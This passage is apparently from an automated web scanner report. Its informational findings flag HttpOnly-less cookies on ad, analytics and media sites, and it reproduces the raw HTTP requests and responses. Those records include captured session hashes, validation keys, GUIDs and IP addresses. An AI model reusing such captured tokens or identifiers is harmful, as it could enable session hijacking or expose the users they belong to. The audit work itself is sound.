aTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1aYhlCGP6Vy1ExkNK7HUtFp4B4dlWpgdiiNEFpEQNZ6MT8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8Vej6qfzVOzTItNJRFsRyXovJB740eR263MFWr1XIQIIGVb5GOMA1TQtwBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_syst
...[SNIP]...
12.12. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p104567837&PRAd=63567820&AR_C=42361216 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; ar_p104567837=exp=1&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Tue, 14 Jun 2011 00:16:20 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010580; expires=Wed 15-Jun-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p104567837=exp=3&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:16:20 2011&prad=63567820&arc=42361216&; expires=Mon 12-Sep-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=3&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010580
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

12.13. http://aux1.forexfactory.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aux1.forexfactory.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=1464&campaignid=334&zoneid=6&cb=c197676785 HTTP/1.1
Host: aux1.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://aux1.forexfactory.com/iframe_bridge.php?type=side&id=9cf049fbaf667788c9c01f31cebc291a&usercp=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; OAID=b5dd50de82560b66a4fa6284b933838f

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:02:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=b5dd50de82560b66a4fa6284b933838f; expires=Wed, 13-Jun-2012 12:02:38 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
12.14. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036034&rn=828106784&c12=781821643-1552181814-1307987147375&c7=http%3A%2F%2Fwww.mtv.com%2Fontv%2F&c4=%2Fontv%2F&c5=20000&c8=MTV%20Original%20Shows%2C%20Reality%20TV%20Shows%20%7C%20Episode&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 13 Jun 2011 17:45:52 GMT
Connection: close
Set-Cookie: UID=f68656b-184.84.69.32-1306935678; expires=Wed, 12-Jun-2013 17:45:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.15. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
12.16. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=2&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010528 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; UID=4a757a7-24.143.206.42-1305663172; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:16:55 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Thu, 13-Jun-2013 00:16:55 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
12.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2713133&PluID=0&e=0&w=300&h=250&ord=3138287&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/i%3B239895957%3B0-0%3B0%3B15527176%3B4307-300/250%3B42522129/42539916/1%3B%3B%7Eokv%3D%3B%3Bs%3D8_10001%3Bmc%3Db2pfreezone%3Btile%3D6%3Bsz%3D336x280%2C300x250%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnu035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+afDX0000000002uK990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzt06hH00002jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnt035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+amoJ0000000002v5a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close
Content-Length: 2180

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
12.18. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?type=pv HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=52319cad089b46ffaf7cb2f75a658057; domain=.microsoft.com; expires=Tue, 14-Jun-2011 01:04:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:16 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
12.19. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=4&gen=1000&gen=100&sid=4df74dbbd76c223d&callback=_ate.ad.hrr&pub=xa-4a9728942b1daf7e&uid=4dce8a530508b02d&url=http%3A%2F%2Fchartupload.com%2F&ref=http%3A%2F%2Fwww.livewithoscar.com%2FCalendar.aspx&1o71l2i HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1306359996.1OD|1307911311.60|1307911311.1EY; dt=X; psc=1; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 14 Jun 2011 12:02:05 GMT
Set-Cookie: di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1307911311.60|1307911311.1EY|1306359996.1OD; Domain=.addthis.com; Expires=Thu, 13-Jun-2013 12:02:05 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 14-Jul-2011 12:02:05 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Tue, 14 Jun 2011 12:02:04 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
12.20. http://cm.mtv.overture.com/js_flat_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /js_flat_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?source=viacom_mtv_ctxt&outputCharEnc=latin1&ctxtUrl=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&cb=5789&config=1458724563&maxCount=3 HTTP/1.1
Host: cm.mtv.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=392qmnl6tfcas&b=3&s=n2; UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCwNXIycAVxhWCw0=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwMLJ1NjMxMAM7FV5gw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Fri, 11-Jun-2021 00:18:18 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=ISO-8859-1
Content-Length: 181

zCn = "";
zRef = "";
zSr = new Array("Reach 80% of active Internet users with Yahoo!.",
"",
"",
"Ads by Yahoo!",
"http://info.yahoo.com/services/us/yahoo/ads/details.html",
"");

12.21. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
12.22. http://community.mtv.com/ScriptResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=v9YncJXL7RtmxQb_GKJIaybQtgpWCky22wAMkRt0D0sQBqP2_-r4PRmSVVN4HbMuZyF78HZwQqQSaKmHrUF2HA2&t=ffffffff89c0ad18 HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
